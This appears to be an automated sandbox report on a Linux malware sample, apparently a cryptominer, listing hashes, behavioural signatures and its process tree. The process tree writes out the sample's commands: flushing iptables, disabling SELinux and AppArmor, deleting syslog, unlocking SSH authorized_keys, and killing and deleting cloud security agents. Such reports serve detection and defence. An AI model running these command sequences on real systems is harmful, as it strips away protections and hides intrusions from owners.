Analysis
-
max time kernel
22s
-
platform
debian-9_armhf
-
resource
debian9-armhf-20240611-en
-
resource tags
arch:armhf
image:debian9-armhf-20240611-en
kernel:4.9.0-13-armmp-lpae
locale:en-us
os:debian-9-armhf
system
-
submitted
01-07-2024 01:08
Static task
static1
Behavioral task
behavioral1
Sample
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
Resource
debian9-mipsel-20240611-en
General
-
Target
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
-
Size
46KB
-
MD5
150dc9ae7c5729552ec2e92a7bc49095
-
SHA1
2aed6d97f2c3400e1eb7e136e245a6f45ef4ae1f
-
SHA256
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
-
SHA512
13c40ba893a9f7a0f3e674400025f65e041e91f09b6def779078e391e35a3dedaf55742e68ae0b9b6f3c9120c1628266fb16348b674e988d146ed3d7b2c3f9c7
-
SSDEEP
768:bxlT2wDuWvWi7JFNcuFkc2zq0x3UKnicZuiR/amT8z:8wF+Lc2/FicfSmT8z
Malware Config
Signatures
-
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
-
Flushes firewall rules 1 IoCs
Flushes/disables firewall rules inside the Linux kernel.
Processes:
pid   process
655   iptables
-
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
pid    process
647    chattr
801    xargs
925    xargs
1013   xargs
703    grep
890    chattr
931    xargs
997    xargs
915    xargs
884    chattr
823    xargs
841    xargs
883    chattr
888    chattr
937    xargs
876    chattr
879    chattr
949    xargs
991    xargs
733    xargs
834    xargs
877    chattr
955    xargs
815    xargs
849    xargs
943    xargs
967    xargs
979    xargs
880    chattr
889    chattr
705    grep
855    xargs
886    chattr
1003   xargs
663    chattr
892    chattr
882    chattr
985    xargs
660    chattr
861    xargs
973    xargs
1008   xargs
665    chattr
808    xargs
961    xargs
653    chattr
794    xargs
920    xargs
668    chattr
740    xargs
-
Disables AppArmor 16 IoCs
Disables AppArmor security module.
Processes:
pid   process
707   systemctl
714   systemctl
720   systemctl
715   systemctl
715   systemctl
715   systemctl
715   systemctl
707   systemctl
723   systemctl
707   systemctl
707   systemctl
707   systemctl
707   systemctl
715   systemctl
715   systemctl
728   systemctl
-
Disables SELinux 1 IoCs
Disables SELinux security module.
Processes:
pid   process
706   setenforce
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 TTPs 6 IoCs
Processes:
description                   ioc                        process
File opened for modification  /usr/bin/ip6network        1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
File opened for modification  /usr/bin/kswaped           1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
File opened for modification  /usr/bin/irqbalanced       1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
File opened for modification  /usr/bin/rctlcli           1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
File opened for modification  /usr/bin/systemd-network   1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
File opened for modification  /usr/bin/pamdicks          1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
-
Reads CPU attributes 1 TTPs 20 IoCs
Processes:
description              ioc                              process
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   sysctl
File opened for reading  /sys/devices/system/cpu/online   ps
File opened for reading  /sys/devices/system/cpu/online   ps
-
Enumerates kernel/hardware configuration 1 TTPs 8 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
description              ioc                          process
File opened for reading  /sys/fs/kdbus/0-system/bus   systemctl
File opened for reading  /sys/fs/kdbus/0-system/bus   systemctl
File opened for reading  /sys/fs/kdbus/0-system/bus   systemctl
File opened for reading  /sys/fs/kdbus/0-system/bus   systemctl
File opened for reading  /sys/fs/kdbus/0-system/bus   systemctl
File opened for reading  /sys/fs/kdbus/0-system/bus   systemctl
File opened for reading  /sys/fs/kdbus/0-system/bus   systemctl
File opened for reading  /sys/fs/kdbus/0-system/bus   systemctl
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
description              ioc                          process
File opened for reading  /proc/19/status              ps
File opened for reading  /proc/285/cmdline            ps
File opened for reading  /proc/744/stat               ps
File opened for reading  /proc/21/stat                ps
File opened for reading  /proc/9/stat                 ps
File opened for reading  /proc/858/stat               ps
File opened for reading  /proc/593/stat               ps
File opened for reading  /proc/731/status             ps
File opened for reading  /proc/96/cmdline             ps
File opened for reading  /proc/11/stat                ps
File opened for reading  /proc/sys/kernel/osrelease   ps
File opened for reading  /proc/24/stat                ps
File opened for reading  /proc/733/stat               ps
File opened for reading  /proc/74/cmdline             ps
File opened for reading  /proc/834/status             ps
File opened for reading  /proc/74/status              ps
File opened for reading  /proc/self/maps              awk
File opened for reading  /proc/23/stat                ps
File opened for reading  /proc/793/status             ps
File opened for reading  /proc/138/cmdline            ps
File opened for reading  /proc/self/fd                xargs
File opened for reading  /proc/filesystems            mv
File opened for reading  /proc/154/status             ps
File opened for reading  /proc/29/cmdline             ps
File opened for reading  /proc/5/status               ps
File opened for reading  /proc/166/status             ps
File opened for reading  /proc/2/status               ps
File opened for reading  /proc/135/status             ps
File opened for reading  /proc/146/status             ps
File opened for reading  /proc/309/status             ps
File opened for reading  /proc/847/status             ps
File opened for reading  /proc/635/stat               ps
File opened for reading  /proc/747/cmdline            ps
File opened for reading  /proc/283/cmdline            ps
File opened for reading  /proc/20/status              ps
File opened for reading  /proc/267/status             ps
File opened for reading  /proc/25/status              ps
File opened for reading  /proc/20/status              ps
File opened for reading  /proc/832/cmdline            ps
File opened for reading  /proc/43/cmdline             ps
File opened for reading  /proc/9/cmdline              ps
File opened for reading  /proc/10/stat                ps
File opened for reading  /proc/267/stat               ps
File opened for reading  /proc/594/stat               ps
File opened for reading  /proc/13/cmdline             ps
File opened for reading  /proc/636/status             ps
File opened for reading  /proc/636/cmdline            ps
File opened for reading  /proc/642/cmdline            ps
File opened for reading  /proc/42/status              ps
File opened for reading  /proc/filesystems            mv
File opened for reading  /proc/filesystems            mv
File opened for reading  /proc/17/stat                ps
File opened for reading  /proc/12/status              ps
File opened for reading  /proc/meminfo                ps
File opened for reading  /proc/96/cmdline             ps
File opened for reading  /proc/29/cmdline             ps
File opened for reading  /proc/7/cmdline              ps
File opened for reading  /proc/635/stat               ps
File opened for reading  /proc/24/stat                ps
File opened for reading  /proc/309/stat               ps
File opened for reading  /proc/639/status             ps
File opened for reading  /proc/uptime                 ps
File opened for reading  /proc/629/stat               ps
File opened for reading  /proc/3/cmdline              ps
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description                   ioc             process
File opened for modification  /tmp/dev/null   1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
Processes
(each entry: [nesting level] executable path: command line, followed by the signatures it triggered)
- [1] /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown: /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
  - Write file to user bin folder
  - Writes file to tmp directory
- [2] /bin/chmod: chmod 777 /usr/bin/chattr
- [2] /bin/chmod: chmod 777 /bin/chattr
- [2] /usr/bin/chattr: chattr -iua /tmp/
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr -iua /var/tmp/
  - Attempts to change immutable files
- [2] /sbin/iptables: iptables -F
  - Flushes firewall rules
- [2] /usr/bin/chattr: chattr -iae /root/.ssh/
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr -iae /root/.ssh/authorized_keys
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr -iua /tmp/
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr -iua /var/tmp/
  - Attempts to change immutable files
- [2] /bin/rm: rm -rf "/tmp/addres*"
- [2] /bin/rm: rm -rf "/tmp/walle*"
- [2] /bin/rm: rm -rf /tmp/keys
- [2] /bin/rm: rm -rf /var/log/syslog
  - Deletes system logs
- [2] /bin/sync: sync
- [2] /bin/cat: cat /var/spool/cron/
- [2] /bin/cat: cat /root/.ssh/authorized_keys
- [2] /bin/mv: mv /usr/bin/wgettnt /usr/bin/wd1
- [2] /bin/mv: mv /usr/bin/curltnt /usr/bin/cd1
  - Reads runtime system information
- [2] /bin/mv: mv /usr/bin/wget1 /usr/bin/wd1
- [2] /bin/mv: mv /usr/bin/curl1 /usr/bin/cd1
- [2] /bin/mv: mv /usr/bin/cur /usr/bin/cd1
- [2] /bin/mv: mv /usr/bin/cdl /usr/bin/cd1
  - Reads runtime system information
- [2] /bin/mv: mv /usr/bin/cdt /usr/bin/cd1
- [2] /bin/mv: mv /usr/bin/xget /usr/bin/wd1
- [2] /bin/mv: mv /usr/bin/wge /usr/bin/wd1
- [2] /bin/mv: mv /usr/bin/wdl /usr/bin/wd1
- [2] /bin/mv: mv /usr/bin/wdt /usr/bin/wd1
- [2] /bin/mv: mv /usr/bin/wget /usr/bin/wd1
  - Reads runtime system information
- [2] /bin/mv: mv /usr/bin/curl /usr/bin/cd1
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /bin/grep: grep -i "[a]liyun"
  - Attempts to change immutable files
- [2] /bin/grep: grep -i "[y]unjing"
  - Attempts to change immutable files
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /usr/sbin/setenforce: setenforce 0
  - Disables SELinux
- [2] /usr/sbin/service: service apparmor stop
- [3] /usr/bin/basename: basename /usr/sbin/service
- [3] /usr/bin/basename: basename /usr/sbin/service
- [3] /bin/systemctl: systemctl --quiet is-active multi-user.target
  - Enumerates kernel/hardware configuration
- [3] /bin/systemctl: systemctl list-unit-files --full "--type=socket"
  - Enumerates kernel/hardware configuration
- [3] /bin/sed: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
- [2] /usr/local/sbin/systemctl: systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  - Disables AppArmor
- [2] /usr/local/bin/systemctl: systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  - Disables AppArmor
- [2] /usr/sbin/systemctl: systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  - Disables AppArmor
- [2] /usr/bin/systemctl: systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  - Disables AppArmor
- [2] /sbin/systemctl: systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  - Disables AppArmor
- [2] /bin/systemctl: systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
- [2] /bin/systemctl: systemctl disable apparmor
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
- [2] /usr/sbin/service: service aliyun.service stop
- [3] /usr/bin/basename: basename /usr/sbin/service
- [3] /usr/bin/basename: basename /usr/sbin/service
- [3] /bin/systemctl: systemctl --quiet is-active multi-user.target
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
- [3] /bin/systemctl: systemctl list-unit-files --full "--type=socket"
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
- [3] /bin/sed: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
- [2] /usr/local/sbin/systemctl: systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  - Disables AppArmor
- [2] /usr/local/bin/systemctl: systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  - Disables AppArmor
- [2] /usr/sbin/systemctl: systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  - Disables AppArmor
- [2] /usr/bin/systemctl: systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  - Disables AppArmor
- [2] /sbin/systemctl: systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  - Disables AppArmor
- [2] /bin/systemctl: systemctl "--job-mode=ignore-dependencies" stop aliyun.service.service
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
- [2] /bin/systemctl: systemctl disable aliyun.service
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
- [2] /bin/grep: grep aegis
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /bin/grep: grep Yun
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /usr/bin/awk: awk "{print \$11}"
- [2] /usr/bin/xargs: xargs dirname
- [3] /usr/local/sbin/dirname: dirname
- [3] /usr/local/bin/dirname: dirname
- [3] /usr/sbin/dirname: dirname
- [3] /usr/bin/dirname: dirname
- [2] /bin/grep: grep aegis
- [2] /usr/bin/xargs: xargs rm -rf
- [3] /usr/local/sbin/rm: rm -rf
- [3] /usr/local/bin/rm: rm -rf
- [3] /usr/sbin/rm: rm -rf
- [3] /usr/bin/rm: rm -rf
- [3] /sbin/rm: rm -rf
- [3] /bin/rm: rm -rf
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /bin/grep: grep -v grep
- [2] /bin/grep: grep hids
- [2] /bin/grep: grep -v grep
- [2] /usr/bin/awk: awk "{print \$11}"
- [2] /usr/bin/xargs: xargs dirname
- [3] /usr/local/sbin/dirname: dirname
- [3] /usr/local/bin/dirname: dirname
- [3] /usr/sbin/dirname: dirname
- [3] /usr/bin/dirname: dirname
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /usr/bin/xargs: xargs rm -rf
- [3] /usr/local/sbin/rm: rm -rf
- [3] /usr/local/bin/rm: rm -rf
- [3] /usr/sbin/rm: rm -rf
- [3] /usr/bin/rm: rm -rf
- [3] /sbin/rm: rm -rf
- [3] /bin/rm: rm -rf
- [2] /usr/bin/xargs: xargs dirname
- [3] /usr/local/sbin/dirname: dirname
- [3] /usr/local/bin/dirname: dirname
- [3] /usr/sbin/dirname: dirname
- [3] /usr/bin/dirname: dirname
- [2] /usr/bin/awk: awk "{print \$11}"
- [2] /bin/grep: grep cloudwalker
- [2] /usr/bin/xargs: xargs rm -rf
- [3] /usr/local/sbin/rm: rm -rf
- [3] /usr/local/bin/rm: rm -rf
- [3] /usr/sbin/rm: rm -rf
- [3] /usr/bin/rm: rm -rf
- [3] /sbin/rm: rm -rf
- [3] /bin/rm: rm -rf
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /usr/bin/awk: awk "{print \$11}"
- [2] /bin/grep: grep titanagent
- [2] /usr/bin/xargs: xargs rm -rf
- [3] /usr/local/sbin/rm: rm -rf
- [3] /usr/local/bin/rm: rm -rf
- [3] /usr/sbin/rm: rm -rf
- [3] /usr/bin/rm: rm -rf
- [3] /sbin/rm: rm -rf
- [3] /bin/rm: rm -rf
- [2] /usr/bin/xargs: xargs dirname
- [3] /usr/local/sbin/dirname: dirname
- [3] /usr/local/bin/dirname: dirname
- [3] /usr/sbin/dirname: dirname
- [3] /usr/bin/dirname: dirname
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /usr/bin/xargs: xargs -I "{}" kill -9 "{}"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /bin/grep: grep edr
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /usr/bin/xargs: xargs -I "{}" kill -9 "{}"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /bin/grep: grep aegis
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /bin/grep: grep Yun
- [2] /usr/bin/xargs: xargs -I "{}" kill -9 "{}"
  - Attempts to change immutable files
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /bin/grep: grep hids
- [2] /usr/bin/xargs: xargs -I "{}" kill -9 "{}"
  - Attempts to change immutable files
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /usr/bin/xargs: xargs -I "{}" kill -9 "{}"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /bin/grep: grep edr
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /bin/grep: grep cloudwalker
- [2] /usr/bin/xargs: xargs -I "{}" kill -9 "{}"
  - Attempts to change immutable files
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /usr/bin/xargs: xargs -I "{}" kill -9 "{}"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /bin/grep: grep titanagent
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /usr/bin/xargs: xargs -I "{}" kill -9 "{}"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /bin/grep: grep sgagent
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /bin/grep: grep -v grep
- [2] /bin/grep: grep barad_agent
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /usr/bin/xargs: xargs -I "{}" kill -9 "{}"
  - Attempts to change immutable files
- [2] /usr/bin/xargs: xargs -I "{}" kill -9 "{}"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /bin/grep: grep hostguard
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
  - Reads runtime system information
- [2] /bin/rm: rm -rf /usr/local/aegis
- [2] /bin/sleep: sleep 1
- [2] /usr/bin/chattr: chattr -i /usr/bin/ip6network
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr -i /usr/bin/kswaped
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr -i /usr/bin/irqbalanced
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr -i /usr/bin/rctlcli
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr -i /usr/bin/systemd-network
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr -i /usr/bin/pamdicks
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr +i /usr/bin/ip6network
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr +i /usr/bin/kswaped
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr +i /usr/bin/irqbalanced
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr +i /usr/bin/rctlcli
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr +i /usr/bin/systemd-network
  - Attempts to change immutable files
- [2] /usr/bin/chattr: chattr +i /usr/bin/pamdicks
  - Attempts to change immutable files
- [2] /bin/sleep: sleep 1
- [2] /bin/rm: rm -f /tmp/.null
- [2] /sbin/sysctl: sysctl -w "vm.nr_hugepages=128"
  - Reads CPU attributes
- [2] /bin/grep: grep 194.87.139.103
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /bin/grep: grep 185.71.65.238
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /bin/grep: grep 140.82.52.87
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /bin/grep: grep -v -
- [2] /bin/grep: grep :23
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
  - Reads runtime system information
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /bin/grep: grep -v -
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /bin/grep: grep :143
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /bin/grep: grep -v -
- [2] /bin/grep: grep :2222
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /bin/grep: grep -v -
- [2] /bin/grep: grep :3333
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /bin/grep: grep -v -
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /bin/grep: grep :3389
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /bin/grep: grep -v -
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /bin/grep: grep :5555
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /bin/grep: grep -v -
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /bin/grep: grep :6666
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /bin/grep: grep :6665
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /bin/grep: grep -v -
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /bin/grep: grep -v -
- [2] /bin/grep: grep :6667
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /bin/grep: grep -v -
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /bin/grep: grep :7777
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /bin/grep: grep -v -
- [2] /bin/grep: grep :8444
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /bin/grep: grep -v -
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /bin/grep: grep :3347
- [2] /usr/bin/awk: awk "{print \$7}"
- [2] /bin/grep: grep :10008
- [2] /usr/bin/awk: awk "-F[/]" "{print \$1}"
  - Reads runtime system information
- [2] /bin/grep: grep -v -
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /bin/grep: grep :13531
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /bin/grep: grep -v grep
- [2] /usr/bin/awk: awk "{print \$2}"
- [2] /usr/bin/xargs: xargs -I "%" kill -9 "%"
  - Attempts to change immutable files
- [2] /bin/grep: grep :3333
- [2] /bin/grep: grep -v grep
- [2] /bin/ps: ps aux
  - Reads CPU attributes
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
/etc/zzhs
Filesize: 2B
MD5: b026324c6904b2a9cb4b88d6d61c81d1
SHA1: e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e
SHA256: 4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
SHA512: 3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686
-
/usr/bin/irqbalanced
Filesize: 2B
MD5: 6d7fce9fee471194aa8b5b6e47267f03
SHA1: a3db5c13ff90a36963278c6a39e4ee3c22e2a436
SHA256: 1121cfccd5913f0a63fec40a6ffd44ea64f9dc135c66634ba001d10bcf4302a2
SHA512: 2b59d179d9815994f687383a886ea34109889756efca5ab27318cc67ce2a21261d12fa6fee6b8c716f72214ead55ee0d789d6c35cff977d40ef5728ba9188a80
-
/usr/bin/kswaped
Filesize: 2B
MD5: 26ab0db90d72e28ad0ba1e22ee510510
SHA1: 7448d8798a4380162d4b56f9b452e2f6f9e24e7a
SHA256: 53c234e5e8472b6ac51c1ae1cab3fe06fad053beb8ebfd8977b010655bfdd3c3
SHA512: 63e22ec2fbeebabf005e58fbfb0eee607c4aa417045a68a0cc63767b048e3559268d35e72f367d3b2dbd5dbddf12fc4397762ba149260b3795a0391713bddcd7
-
/usr/bin/pamdicks
Filesize: 2B
MD5: 9ae0ea9e3c9c6e1b9b6252c8395efdc1
SHA1: ccf271b7830882da1791852baeca1737fcbe4b90
SHA256: 06e9d52c1720fca412803e3b07c4b228ff113e303f4c7ab94665319d832bbfb7
SHA512: f3d08a4bfef201adbe711e8805f96ff13909719107dcac81f4fc9185040d59d8d573344a0707e697f8b4f0212e0d79f3bdd6b86688dd8c54019b9d93c937f3ca
-
/usr/bin/rctlcli
Filesize: 2B
MD5: 48a24b70a0b376535542b996af517398
SHA1: 9c6b057a2b9d96a4067a749ee3b3b0158d390cf1
SHA256: 7de1555df0c2700329e815b93b32c571c3ea54dc967b89e81ab73b9972b72d1d
SHA512: db545c410fd0c8ede533d5b0666cd2798ba380bd25b655619cd5fd3a33a255569b3ccc319bfdef3322d8392d894d15c2e6aa2d53346e6ac54eaf5d627bfe6a9a
-
/usr/bin/systemd-network
Filesize: 2B
MD5: 1dcca23355272056f04fe8bf20edfce0
SHA1: 5d9474c0309b7ca09a182d888f73b37a8fe1362c
SHA256: f0b5c2c2211c8d67ed15e75e656c7862d086e9245420892a7de62cd9ec582a06
SHA512: 29b3573989378848e91465abb8bb12aaad1c40f01ddba6ce5dce4de88d61d49621cd4272bc6f889cd469e9490040b412eb0a237cf2cd49c637da1d5de5903f3d
-
memory/977-1-0xb6c4c000-0xb6c5d044-memory.dmp